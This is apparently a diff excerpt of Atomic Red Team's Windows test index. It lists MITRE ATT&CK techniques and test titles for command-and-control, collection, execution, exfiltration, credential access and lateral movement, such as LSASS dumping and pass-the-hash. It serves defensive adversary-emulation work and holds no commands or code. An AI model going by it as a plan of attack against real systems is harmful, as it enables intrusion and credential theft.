- T1001 Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.001 Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090.004 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568 Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.003 DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1132 Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1001 Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1102.001 Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1090.004 Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1568 Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1573 Encrypted Channel](../../T1573/T1573.md)
- Atomic Test #1: OpenSSL C2 [windows]
- T1090.002 External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.002 File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090.002 External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1071.002 File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1105 Ingress Tool Transfer](../../T1105/T1105.md)
- Atomic Test #7: certutil download (urlcache) [windows]
- Atomic Test #8: certutil download (verifyctl) [windows]
@@ -1148,79 +714,108 @@
- Atomic Test #11: OSTAP Worming Activity [windows]
- Atomic Test #12: svchost writing a file to a UNC path [windows]
- Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows]
- Atomic Test #15: File Download via PowerShell [windows]
- Atomic Test #16: File download with finger.exe on Windows [windows]
- Atomic Test #17: Download a file with IMEWDBLD.exe [windows]
- Atomic Test #18: Curl Download File [windows]
- Atomic Test #19: Curl Upload File [windows]
- Atomic Test #20: Download a file with Microsoft Connection Manager Auto-Download [windows]
- [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
- Atomic Test #3: portproxy reg key [windows]
- T1001.001 Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.003 Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1104 Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.003 Multi-hop Proxy](../../T1090.003/T1090.003.md)
- Atomic Test #1: Psiphon [windows]
- Atomic Test #2: Tor Proxy Usage - Windows [windows]
- T1026 Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1001.001 Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1071.003 Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1104 Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1090.003 Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1026 Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1095 Non-Application Layer Protocol](../../T1095/T1095.md)
- Atomic Test #1: ICMP C2 [windows]
- Atomic Test #2: Netcat C2 [windows]
- Atomic Test #3: Powercat C2 [windows]
- T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1571 Non-Standard Port](../../T1571/T1571.md)
- Atomic Test #1: Testing usage of uncommonly used port with PowerShell [windows]
- T1102.003 One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1001.003 Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1572 Protocol Tunneling](../../T1572/T1572.md)
- Atomic Test #1: DNS over HTTPS Large Query Volume [windows]
- Atomic Test #2: DNS over HTTPS Regular Beaconing [windows]
- Atomic Test #3: DNS over HTTPS Long Domain Query [windows]
- T1090 Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.003 One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1001.003 Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1572 Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1090 Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1219 Remote Access Software](../../T1219/T1219.md)
- Atomic Test #1: TeamViewer Files Detected Test on Windows [windows]
- Atomic Test #2: AnyDesk Files Detected Test on Windows [windows]
- Atomic Test #3: LogMeIn Files Detected Test on Windows [windows]
- Atomic Test #4: GoToAssist Files Detected Test on Windows [windows]
- Atomic Test #5: ScreenConnect Application Download and Install on Windows [windows]
- Atomic Test #6: Ammyy Admin Software Execution [windows]
- Atomic Test #7: RemotePC Software Execution [windows]
- [T1132.001 Standard Encoding](../../T1132.001/T1132.001.md)
- Atomic Test #2: XOR Encoded data. [windows]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132.001 Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1001.002 Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1071.001 Web Protocols](../../T1071.001/T1071.001.md)
- Atomic Test #1: Malicious User Agents - Powershell [windows]
- Atomic Test #2: Malicious User Agents - CMD [windows]
- T1102 Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102 Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# collection
- [T1560 Archive Collected Data](../../T1560/T1560.md)
- Atomic Test #1: Compress Data for Exfiltration With PowerShell [windows]
- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1560.002 Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1560.001 Archive via Utility](../../T1560.001/T1560.001.md)
- Atomic Test #1: Compress Data for Exfiltration With Rar [windows]
- Atomic Test #2: Compress Data and lock with password for Exfiltration with winrar [windows]
- Atomic Test #3: Compress Data and lock with password for Exfiltration with winzip [windows]
- Atomic Test #4: Compress Data and lock with password for Exfiltration with 7zip [windows]
- [T1123 Audio Capture](../../T1123/T1123.md)
- Atomic Test #1: using device audio capture commandlet [windows]
- [T1119 Automated Collection](../../T1119/T1119.md)
- Atomic Test #1: Automated Collection Command Prompt [windows]
- Atomic Test #2: Automated Collection PowerShell [windows]
- Atomic Test #3: Recon information for export with PowerShell [windows]
- Atomic Test #4: Recon information for export with Command Prompt [windows]
- [T1115 Clipboard Data](../../T1115/T1115.md)
- Atomic Test #1: Utilize Clipboard to store or execute commands from [windows]
- Atomic Test #2: Execute Commands from Clipboard using PowerShell [windows]
- [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md)
- Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
- T1074 Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1005 Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1114 Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1114.003 Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)
- Atomic Test #2: PowerShell - Prompt User for Password [windows]
- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #1: Input Capture [windows]
- T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md)
- Atomic Test #1: Stage data from Discovery.bat [windows]
- Atomic Test #3: Zip a Folder with PowerShell for Staging in Temp [windows]
- [T1114.001 Local Email Collection](../../T1114.001/T1114.001.md)
- Atomic Test #1: Email Collection with PowerShell Get-Inbox [windows]
- T1185 Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1113 Screen Capture](../../T1113/T1113.md)
- Atomic Test #5: Windows Screencapture [windows]
- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1125 Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# execution
- [T1053.002 At (Windows)](../../T1053.002/T1053.002.md)
- Atomic Test #1: At.exe Scheduled task [windows]
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1559.001 Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1175 Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1559.001 Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1175 Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1559.002 Dynamic Data Exchange](../../T1559.002/T1559.002.md)
- Atomic Test #1: Execute Commands [windows]
- Atomic Test #2: Execute PowerShell script via Word DDE [windows]
- Atomic Test #3: DDEAUTO [windows]
- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059.007 JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1059.007 JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1204.002 Malicious File](../../T1204.002/T1204.002.md)
- Atomic Test #1: OSTap Style Macro Execution [windows]
- Atomic Test #2: OSTap Payload Download [windows]
- Atomic Test #3: Maldoc choice flags command execution [windows]
- Atomic Test #4: OSTAP JS version [windows]
- Atomic Test #5: Office launching .bat file from AppData [windows]
- Atomic Test #6: Excel 4 Macro [windows]
- Atomic Test #7: Headless Chrome code execution via VBA [windows]
- Atomic Test #8: Potentially Unwanted Applications (PUA) [windows]
- Atomic Test #9: Office Generic Payload Download [windows]
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1106 Native API](../../T1106/T1106.md)
- Atomic Test #1: Execution through API - CreateProcess [windows]
- [T1059.001 PowerShell](../../T1059.001/T1059.001.md)
@@ -1238,41 +833,25 @@
- Atomic Test #12: PowerShell Downgrade Attack [windows]
- Atomic Test #13: NTFS Alternate Data Stream Access [windows]
- Atomic Test #14: PowerShell Session Creation and Use [windows]
- Atomic Test #15: ATHPowerShellCommandLineParameter -Command parameter variations [windows]
- Atomic Test #16: ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments [windows]
- Atomic Test #17: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows]
- Atomic Test #18: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows]
- Atomic Test #19: PowerShell Command Execution [windows]
- Atomic Test #20: PowerShell Invoke Known Malicious Cmdlets [windows]
- Atomic Test #21: PowerUp Invoke-AllChecks [windows]
- T1059.006 Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059.006 Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md)
- Atomic Test #1: Scheduled Task Startup Script [windows]
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
- Atomic Test #5: Task Scheduler via VBA [windows]
- Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows]
- Atomic Test #7: Scheduled Task Executing Base64 Encoded Commands From Registry [windows]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1569.002 Service Execution](../../T1569.002/T1569.002.md)
- Atomic Test #1: Execute a Command as a Service [windows]
- Atomic Test #2: Use PsExec to execute a command on a remote host [windows]
- T1129 Shared Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1072 Software Deployment Tools](../../T1072/T1072.md)
- Atomic Test #1: Radmin Viewer Utility [windows]
- T1569 System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1129 Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1569 System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1204 User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1059.005 Visual Basic](../../T1059.005/T1059.005.md)
- Atomic Test #1: Visual Basic script execution to gather local computer information [windows]
- Atomic Test #2: Encoded VBS code execution [windows]
- Atomic Test #3: Extract Memory via VBA [windows]
- [T1059.003 Windows Command Shell](../../T1059.003/T1059.003.md)
- Atomic Test #1: Create and Execute Batch Script [windows]
- Atomic Test #2: Writes text to a file and displays it. [windows]
- Atomic Test #3: Suspicious Execution via Windows Command Shell [windows]
- Atomic Test #4: Simulate BlackByte Ransomware Print Bombing [windows]
- [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
- Atomic Test #1: WMI Reconnaissance Users [windows]
- Atomic Test #2: WMI Reconnaissance Processes [windows]
@@ -1280,101 +859,161 @@
- Atomic Test #4: WMI Reconnaissance List Remote Services [windows]
- Atomic Test #5: WMI Execute Local Process [windows]
- Atomic Test #6: WMI Execute Remote Process [windows]
- Atomic Test #7: Create a Process using WMI Query and an Encoded Command [windows]
- Atomic Test #8: Create a Process using obfuscated Win32_Process [windows]
- Atomic Test #9: WMI Execute rundll32 [windows]
- Atomic Test #10: Application uninstall using WMIC [windows]
# exfiltration
- [T1020 Automated Exfiltration](../../T1020/T1020.md)
- Atomic Test #1: IcedID Botnet HTTP PUT [windows]
- T1030 Data Transfer Size Limits [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md)
- Atomic Test #3: DNSExfiltration (doh) [windows]
- [T1048.002 Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md)
- Atomic Test #1: Exfiltrate data HTTPS using curl windows [windows]
- T1011.001 Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1041 Exfiltration Over C2 Channel](../../T1041/T1041.md)
- Atomic Test #1: C2 Data Exfiltration [windows]
- T1011 Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1048.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1030 Data Transfer Size Limits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1048 Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1048.002 Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1011.001 Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1041 Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1011 Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1048.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1048.003 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md)
- Atomic Test #2: Exfiltration Over Alternative Protocol - ICMP [windows]
- Atomic Test #4: Exfiltration Over Alternative Protocol - HTTP [windows]
- Atomic Test #5: Exfiltration Over Alternative Protocol - SMTP [windows]
- [T1567 Exfiltration Over Web Service](../../T1567/T1567.md)
- Atomic Test #1: Data Exfiltration with ConfigSecurityPolicy [windows]
- T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.002 Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1029 Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1567.002 Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1029 Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# credential-access
- T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1003.005 Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md)
- Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md)
- Atomic Test #3: Extracting passwords with findstr [windows]
- Atomic Test #4: Access unattend.xml [windows]
- T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
- Atomic Test #1: Run Chrome-password Collector [windows]
- [T1552.002 Credentials in Registry](../../T1552.002/T1552.002.md)
- Atomic Test #1: Enumeration for Credentials in Registry [windows]
- Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows]
- T1003.006 DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1187 Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)
- Atomic Test #2: PowerShell - Prompt User for Password [windows]
- T1558.001 Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1552.006 Group Policy Preferences](../../T1552.006/T1552.006.md)
- Atomic Test #1: GPP Passwords (findstr) [windows]
- Atomic Test #2: GPP Passwords (Get-GPPPassword) [windows]
- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1558.003 Kerberoasting](../../T1558.003/T1558.003.md)
- Atomic Test #1: Request for service tickets [windows]
- [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #1: Input Capture [windows]
- T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1003.004 LSA Secrets](../../T1003.004/T1003.004.md)
- Atomic Test #1: Dumping LSA Secrets [windows]
- [T1003.001 LSASS Memory](../../T1003.001/T1003.001.md)
- Atomic Test #1: Windows Credential Editor [windows]
- Atomic Test #2: Dump LSASS.exe Memory using ProcDump [windows]
- Atomic Test #3: Dump LSASS.exe Memory using comsvcs.dll [windows]
- Atomic Test #4: Dump LSASS.exe Memory using direct system calls and API unhooking [windows]
- Atomic Test #5: Dump LSASS.exe Memory using Windows Task Manager [windows]
- Atomic Test #6: Offline Credential Theft With Mimikatz [windows]
- Atomic Test #7: LSASS read with pypykatz [windows]
- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1003.003 NTDS](../../T1003.003/T1003.003.md)
- Atomic Test #1: Create Volume Shadow Copy with vssadmin [windows]
- Atomic Test #2: Copy NTDS.dit from Volume Shadow Copy [windows]
- Atomic Test #3: Dump Active Directory Database with NTDSUtil [windows]
- Atomic Test #4: Create Volume Shadow Copy with WMI [windows]
- Atomic Test #5: Create Volume Shadow Copy with Powershell [windows]
- Atomic Test #6: Create Symlink to Volume Shadow Copy [windows]
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #3: Packet Capture Windows Command Prompt [windows]
- Atomic Test #4: Windows Internal Packet Capture [windows]
- [T1003 OS Credential Dumping](../../T1003/T1003.md)
- Atomic Test #1: Powershell Mimikatz [windows]
- Atomic Test #2: Gsecdump [windows]
- Atomic Test #3: Credential Dumping with NPPSpy [windows]
- [T1110.002 Password Cracking](../../T1110.002/T1110.002.md)
- Atomic Test #1: Password Cracking with Hashcat [windows]
- [T1556.002 Password Filter DLL](../../T1556.002/T1556.002.md)
- Atomic Test #1: Install and Register Password Filter DLL [windows]
- [T1110.001 Password Guessing](../../T1110.001/T1110.001.md)
- Atomic Test #1: Brute Force Credentials [windows]
- [T1110.003 Password Spraying](../../T1110.003/T1110.003.md)
- Atomic Test #1: Password Spray all Domain Users [windows]
- Atomic Test #2: Password Spray (DomainPasswordSpray) [windows]
- [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
- Atomic Test #1: Private Keys [windows]
- [T1003.002 Security Account Manager](../../T1003.002/T1003.002.md)
- Atomic Test #1: Registry dump of SAM, creds, and secrets [windows]
- Atomic Test #2: Registry parse with pypykatz [windows]
- Atomic Test #3: esentutl.exe SAM copy [windows]
- Atomic Test #4: PowerDump Registry dump of SAM for hashes and usernames [windows]
- T1558.002 Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1111 Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# lateral-movement
- T1175 Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1175 Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1021.003 Distributed Component Object Model](../../T1021.003/T1021.003.md)
- Atomic Test #1: PowerShell Lateral Movement using MMC20 [windows]
- T1210 Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1570 Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1210 Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1570 Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1550.002 Pass the Hash](../../T1550.002/T1550.002.md)
- Atomic Test #1: Mimikatz Pass the Hash [windows]
- Atomic Test #2: crackmapexec Pass the Hash [windows]
- Atomic Test #3: Invoke-WMIExec Pass the Hash [windows]
- [T1550.003 Pass the Ticket](../../T1550.003/T1550.003.md)
- Atomic Test #1: Mimikatz Kerberos Ticket Attack [windows]
- Atomic Test #2: Rubeus Kerberos Pass The Ticket [windows]
- [T1563.002 RDP Hijacking](../../T1563.002/T1563.002.md)
- Atomic Test #1: RDP hijacking [windows]
- [T1021.001 Remote Desktop Protocol](../../T1021.001/T1021.001.md)
- Atomic Test #1: RDP to DomainController [windows]
- Atomic Test #2: RDP to Server [windows]
- Atomic Test #3: Changing RDP Port to Non Standard Port via Powershell [windows]
- Atomic Test #4: Changing RDP Port to Non Standard Port via Command_Prompt [windows]
- T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1021 Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1091 Replication Through Removable Media](../../T1091/T1091.md)
- Atomic Test #1: USB Malware Spread Simulation [windows]
- T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1021 Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1021.002 SMB/Windows Admin Shares](../../T1021.002/T1021.002.md)
- Atomic Test #1: Map admin share [windows]
- Atomic Test #2: Map Admin Share PowerShell [windows]
- Atomic Test #3: Copy and Execute File with PsExec [windows]
- Atomic Test #4: Execute command writing output to local Admin Share [windows]
- T1051 Shared Webroot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1072 Software Deployment Tools](../../T1072/T1072.md)
- Atomic Test #1: Radmin Viewer Utility [windows]
- T1080 Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1021.005 VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1051 Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
